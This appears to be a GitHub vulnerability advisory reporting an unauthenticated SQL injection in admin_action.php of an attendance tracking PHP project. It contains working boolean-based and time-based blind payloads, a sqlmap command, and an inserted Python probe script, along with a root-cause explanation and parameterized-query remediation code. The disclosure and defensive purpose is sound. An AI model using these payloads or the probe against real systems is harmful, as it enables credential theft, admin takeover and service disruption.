Attendance Tracking Management System V1.0 /admin/admin_action.php SQL injection #1

Status: Open
vicleet (Owner) opened this issue on Dec 24, 2024 · 0 comments

Attendance Tracking Management System PHP & MySQL Project – SQL Injection Vulnerability

1. Overview

A critical SQL injection vulnerability has been identified in the Attendance Tracking Management System PHP & MySQL Project (v1.0). The issue is in /admin/admin_action.php, where the user-supplied admin_user_name POST parameter is concatenated into SQL statements without parameterization or escaping. The flaw allows a remote attacker to alter the query logic and perform unauthorized database operations, compromising the integrity of the application's data.

No login or authorization is required to exploit this vulnerability, elevating its severity.


2. Technical Details

2.1 Vulnerability Type

  • SQL Injection
    • Boolean-based blind
    • Time-based blind

2.2 Root Cause

The admin_user_name parameter is inserted directly into SQL queries without validation or escaping of special characters. Both payloads below begin by closing a double quote ("), which shows that the value lands inside a double-quoted MySQL string literal: the injected text terminates that literal, appends an OR condition or a SLEEP() expression, and the trailing "-- " comments out whatever follows in the original statement. Any filter that only escapes single quotes therefore does not stop these payloads.

sqlmap confirmed both techniques on the same parameter:

    Parameter: admin_user_name (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: admin_user_name=-2821" OR 1396=1396-- XqfC&admin_password=password&admin_id=2&action=Edit

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: admin_user_name=admin123" AND (SELECT 2838 FROM (SELECT(SLEEP(5)))iIKL)-- hmQf&admin_password=password&admin_id=2&action=Edit

3. Impact

Exploiting this vulnerability could allow attackers to:

  • Read or Modify Sensitive Data: Database contents, including the admin credentials this endpoint manages, can be extracted through the blind techniques above, or altered or deleted if the injected statement permits it.
  • Escalate Privileges: Because the injectable request edits an admin account, an attacker who can steer the query may change or create admin credentials and obtain administrative access to the application.
  • Interrupt Services: Time-based payloads such as SLEEP() hold a database connection for the duration of each request; enough of them sent in parallel exhaust the connection pool and make the application unresponsive.
  • Compromise System Integrity: Depending on the privileges of the database account the application uses (for example MySQL FILE), an attacker may be able to read or write files on the server and pivot to other parts of the host or network.

4. Exploitation

  1. Craft Malicious Input
    Attackers embed SQL injection payloads into the admin_user_name field.

  2. Send HTTP POST Request
    A specially crafted request is sent to /admin/admin_action.php with parameters like:

    admin_user_name=admin123" AND (SELECT 2838 FROM (SELECT(SLEEP(5)))iIKL)-- hmQf
    &admin_password=password&admin_id=2&action=Edit
  3. Automated Tools
    Tools such as sqlmap facilitate detection and exploitation. For instance:

    sqlmap -u "http://10.211.55.6:1131/admin/admin_action.php" \
           --data="admin_user_name=admin123&admin_password=password&admin_id=2&action=Edit" \
           --batch --level=5 --risk=3 --dbs

    Successful exploitation grants database insights, as shown in the testing screenshots:

    [Screenshots "image" and "image-1" (sqlmap output) are not reproduced in this text copy of the issue]
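A manual confirmation of the time-based finding, added here as example code that is not part of the advisory or of the project: it posts the advisory's benign request body and its SLEEP(5) payload body several times each and compares the slowest benign response with the fastest SLEEP response, so one slow baseline request cannot produce a false positive. The default host is the one from the sqlmap command above; the transport function is injectable so the decision logic can be exercised without a live target. Because every request carries action=Edit and admin_id=2, each probe may modify that admin record if the underlying statement is an UPDATE.

```python
"""Added example (not the advisory's or the project's code): time-based
blind SQL injection confirmation for /admin/admin_action.php."""
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

# Fixed fields from the advisory's request body.
BASE_FIELDS = {"admin_password": "password", "admin_id": "2", "action": "Edit"}
BENIGN_VALUE = "admin123"
SLEEP_SECONDS = 5
# Payload quoted from the advisory: the leading double quote closes the
# string literal, SLEEP() delays the query, "-- " comments out the rest.
TIME_PAYLOAD = (f'admin123" AND (SELECT 2838 FROM (SELECT(SLEEP({SLEEP_SECONDS})))iIKL)-- hmQf')
# Host taken from the advisory's sqlmap command; override on the command line.
DEFAULT_URL = "http://10.211.55.6:1131/admin/admin_action.php"


def build_body(admin_user_name: str) -> str:
    """URL-encode the POST body; urlencode takes care of quotes, parentheses
    and spaces so the payload arrives at PHP exactly as written."""
    return urllib.parse.urlencode({"admin_user_name": admin_user_name, **BASE_FIELDS})


def http_post_seconds(url: str, body: str, timeout: float = 30.0) -> float:
    """Default transport: POST the body and return elapsed wall-clock seconds."""
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # a 4xx/5xx page still reveals how long the query took
    return time.monotonic() - start


def time_based_check(url: str,
                     post: Callable[[str, str], float] = http_post_seconds,
                     trials: int = 3) -> dict:
    """Injectable if even the fastest SLEEP response is clearly slower than
    the slowest benign one (80% of the requested delay, to absorb jitter)."""
    benign = [post(url, build_body(BENIGN_VALUE)) for _ in range(trials)]
    sleepy = [post(url, build_body(TIME_PAYLOAD)) for _ in range(trials)]
    delta = min(sleepy) - max(benign)
    return {
        "benign_max": max(benign),
        "sleep_min": min(sleepy),
        "delta": delta,
        "injectable": delta >= SLEEP_SECONDS * 0.8,
    }


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_URL
    print(time_based_check(target))
```

Run it as `python3 check.py http://host:port/admin/admin_action.php`; a result with `injectable: True` and a delta close to 5 seconds reproduces the advisory's second finding without sqlmap.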

5. Remediation

  • Use Prepared Statements
    Pass admin_user_name, admin_password and admin_id as bound parameters (mysqli prepare()/bind_param() or PDO prepare()/execute()) so that user input is never part of the SQL text. This is the actual fix; the remaining items are defense in depth.

  • Strict Input Validation
    Reject admin_user_name values that fall outside an explicit allow-list of characters and a maximum length. Validation on its own is not sufficient: filters that only escape single quotes miss the payloads above, which close a double-quoted literal.

  • Principle of Least Privilege
    Run the application under a dedicated MySQL account that holds only the DML privileges it needs on its own schema. Never use root, and do not grant FILE or SUPER, which turn an injection into file read/write on the server.

  • Regular Security Testing
    Perform routine code reviews and security scans (sqlmap against every form handler under /admin/ is a quick check) to detect and address such issues before release.
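The vulnerable pattern and the parameterized fix side by side, as an added Python/SQLite model rather than code from the project (the admin_action.php source is not on this page): the table and column names, the SELECT lookup shape and the sample admin rows are assumptions, and the PHP equivalents of the fix are mysqli prepare()/bind_param() or PDO prepare()/execute(). SQLite string literals use single quotes, so the boolean payload here closes a single quote where the advisory's closes a double quote; the logic of the injection is otherwise identical.

```python
"""Added example (not the project's code): SQLite model of the injectable
query shape inferred from the advisory's payloads, beside the fix."""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the project's admin table
    (schema and rows are assumptions for this demo)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (admin_id INTEGER PRIMARY KEY, "
                "admin_user_name TEXT, admin_password TEXT)")
    con.executemany("INSERT INTO admin VALUES (?, ?, ?)",
                    [(1, "admin", "secret1"), (2, "admin123", "secret2"),
                     (3, "auditor", "secret3")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, admin_user_name: str) -> list:
    """Vulnerable pattern: the POST value is interpolated into the SQL text,
    which is the defect the advisory describes."""
    sql = f"SELECT admin_id FROM admin WHERE admin_user_name = '{admin_user_name}'"
    return sorted(row[0] for row in con.execute(sql))


def lookup_safe(con: sqlite3.Connection, admin_user_name: str) -> list:
    """Fix: a placeholder keeps the value out of the SQL text, so quotes,
    OR clauses and comment markers are just characters in a name."""
    sql = "SELECT admin_id FROM admin WHERE admin_user_name = ?"
    return sorted(row[0] for row in con.execute(sql, (admin_user_name,)))


# Defense in depth only: an allow-list for user names. It does not replace
# the placeholder above; a bypass of this regex must still be harmless.
USER_NAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def is_valid_user_name(value: str) -> bool:
    return USER_NAME_RE.fullmatch(value) is not None


def demo() -> dict:
    con = make_db()
    honest = "admin123"
    # Single-quote analogue of the advisory's boolean payload
    # -2821" OR 1396=1396-- XqfC : closes the literal, ORs in a true
    # condition, and comments out the trailing quote of the original query.
    payload = "-2821' OR 1396=1396-- XqfC"
    return {
        "honest_vuln": lookup_vulnerable(con, honest),   # one matching row
        "payload_vuln": lookup_vulnerable(con, payload), # every row matches
        "payload_safe": lookup_safe(con, payload),       # no such user name
        "payload_valid": is_valid_user_name(payload),
        "honest_valid": is_valid_user_name(honest),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The interesting comparison is payload_vuln against payload_safe: the same string returns the whole table from the concatenated query and nothing from the parameterized one, which is the behavioural difference a reviewer should look for in admin_action.php.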


6. References and Further Reading


Disclaimer:
This wiki-style report is intended for responsible disclosure purposes. Unauthorized exploitation or distribution of these details may violate applicable laws. The vendor should promptly apply the recommended fixes to protect users and maintain system reliability.


vicleet changed the title from "1000projects Attendance Tracking Management System PHP & MySQL Project V1.0 /admin/admin_action.php SQL injection" to "Attendance Tracking Management System V1.0 /admin/admin_action.php SQL injection" on Dec 29, 2024.